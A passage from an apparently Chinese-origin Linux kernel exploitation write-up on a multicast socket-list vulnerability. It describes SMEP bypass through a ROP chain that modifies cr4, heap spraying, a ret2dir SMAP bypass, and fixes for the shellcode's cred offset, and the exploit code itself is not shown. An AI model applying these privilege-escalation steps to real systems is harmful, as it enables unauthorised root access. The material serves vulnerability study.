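static const char *double_swapped(const char *text, char *out, socklen_t len)
{
	struct in_addr a;

	a.s_addr = htonl(inet_addr(text));
	return inet_ntop(AF_INET, &a, out, len);
}

/* Returns 1 if the address used by the spray code resolves to 224.2.10.10
 * (true on little-endian hosts such as x86-64). */
static int spray_group_is_224_2_10_10(void)
{
	char buf[INET_ADDRSTRLEN];
	const char *s = double_swapped("10.10.2.224", buf, sizeof(buf));

	assert(s != NULL);
	return strcmp(s, "224.2.10.10") == 0;
}
```

Writing the group as inet_addr("224.2.10.10") directly would be an equivalent and less surprising way to express the same address.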

(3) Complete exploit

Differences from the exploit without SMEP:

(1) Use the pivot_stack gadget to jump to the user-space stack;
(2) Place the ROP chain in the user space pointed to by EAX; it modifies cr4 and jumps to get_root;
(3) Add the heap spray initialization function and the heap spray function;
(4) Building the ROP chain clobbers rbp, but when get_root() returns it copies rbp to rsp (leave; ret;). rbp therefore has to be saved at the start of the ROP chain and restored at the start of get_root(). (The ROP chain saves it to the rcx register, and get_root() begins with mov %rcx,%rbp; to restore it.)

Follow-up: SMAP can be bypassed with the ret2dir technique, which makes it possible to forge the ip_mc_socklist in kernel space.

Screenshot of a successful run:

4, Problems

Problem 1: every time the virtual machine starts, $ ifconfig -a shows only the lo loopback interface, and the init script cannot bring up eth0.

Solution: QEMU emulates an e1000 network card, but the default Linux kernel configuration does not build the e1000 driver into the kernel. Before compiling, set CONFIG_E1000 and CONFIG_E1000E to =y in .config.

Problem 2: the vulnerability is not triggered at all. Execution never reaches ip_mc_join_group() -> sock_kmalloc(), so mc_list is not created.

int ip_mc_join_group(struct sock *sk, struct ip_mreqn *imr)
{
	__be32 addr = imr->imr_multiaddr.s_addr;
	struct ip_mc_socklist *iml, *i;
	struct in_device *in_dev;
	struct inet_sock *inet = inet_sk(sk);
	struct net *net = sock_net(sk);
	int ifindex;
	int count = 0;
	int err;

	ASSERT_RTNL();

	if (!ipv4_is_multicast(addr))  		// The address must be a multicast address, i.e. its first byte is in the range 0xe0 (224) to 0xef (239)
		return -EINVAL;

// Find the interface device on which the multicast address is to be set:
// 1. If the user passes in an interface index, search by that index (e.g. under IPv6).
// 2. Otherwise, if the user passes in the interface address, search by that address.
// 3. Otherwise, look the multicast address up in the routing table and take the network interface of the matching route.
	in_dev = ip_mc_find_dev(net, imr);	// Route lookup. This kept failing here, probably because of the routing configuration of the virtual machine

	if (!in_dev) {
		err = -ENODEV;
		goto done;
	}

	err = -EADDRINUSE;
	ifindex = imr->imr_ifindex;
	for_each_pmc_rtnl(inet, i) {
		if (i->multi.imr_multiaddr.s_addr == addr &&
		    i->multi.imr_ifindex == ifindex)
			goto done;
		count++;
	}
	err = -ENOBUFS;
	if (count >= net->ipv4.sysctl_igmp_max_memberships)
		goto done;
	iml = sock_kmalloc(sk, sizeof(*iml), GFP_KERNEL); 	// Allocate memory for the ip_mc_socklist structure. The loop above compares every existing group address and interface of the socket and jumps to done with -EADDRINUSE as soon as a match is found; otherwise the counter is incremented.
	if (!iml)
		goto done;

	memcpy(&iml->multi, imr, sizeof(*imr));	// A socket joining a multicast group needs a new record in the list of groups it belongs to. The memory was allocated above; the following assignments fill in the fields of the structure.
	iml->next_rcu = inet->mc_list;
	iml->sflist = NULL;
	iml->sfmode = MCAST_EXCLUDE;
	rcu_assign_pointer(inet->mc_list, iml);
	ip_mc_inc_group(in_dev, addr);
	err = 0;
done:
	return err;
}

Solution: ip_mc_find_dev(net, imr) returns NULL and the function exits, because the network interface cannot be found in the routing table from the group address. The reason is that no IP route for the class D multicast network has been added (Ubuntu usually sets this up automatically, but inside QEMU it is not set by default). The following route needs to be added (see "Linux configuration and testing IP Multicast"):

$ route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0

Class D addresses are used for multicast. The first byte of a class D IP address starts with the bits "1110". These are specially reserved addresses that do not identify a particular network; a multicast address addresses a group of computers sharing the same protocol at once. The class D range is 224.0.0.0 to 239.255.255.255.
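The "1110" prefix rule can be written as a short check. The sketch below applies the same mask test that ipv4_is_multicast() performs in the kernel, but in user space on a dotted-quad string; `is_class_d()` is a hypothetical helper name.

```c
#include <assert.h>
#include <arpa/inet.h>
#include <stdint.h>

/* Returns 1 if the dotted-quad address is in 224.0.0.0/4, else 0.
 * Unparseable input also returns 0. */
static int is_class_d(const char *dotted)
{
	struct in_addr a;

	if (inet_pton(AF_INET, dotted, &a) != 1)
		return 0;
	return (ntohl(a.s_addr) & 0xf0000000u) == 0xe0000000u;
}

/* Boundary examples for the class D range. */
static void check_examples(void)
{
	assert(is_class_d("224.0.0.0"));
	assert(is_class_d("239.255.255.255"));
	assert(!is_class_d("223.255.255.255"));
	assert(!is_class_d("240.0.0.0"));
}
```

This is also why the route added above uses the netmask 240.0.0.0: it matches exactly the top four bits of the address.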

Problem 3: the shellcode executes successfully, but cred is not modified.

Solution: the offset of cred from the start of the task_struct structure may be wrong.

gdb-peda$ p/x &(*(struct task_struct *)0)->cred				# cred is at offset 0x640 from the start of task_struct, not 0x5f8, so the offset in the shellcode has to be changed
$2 = 0x640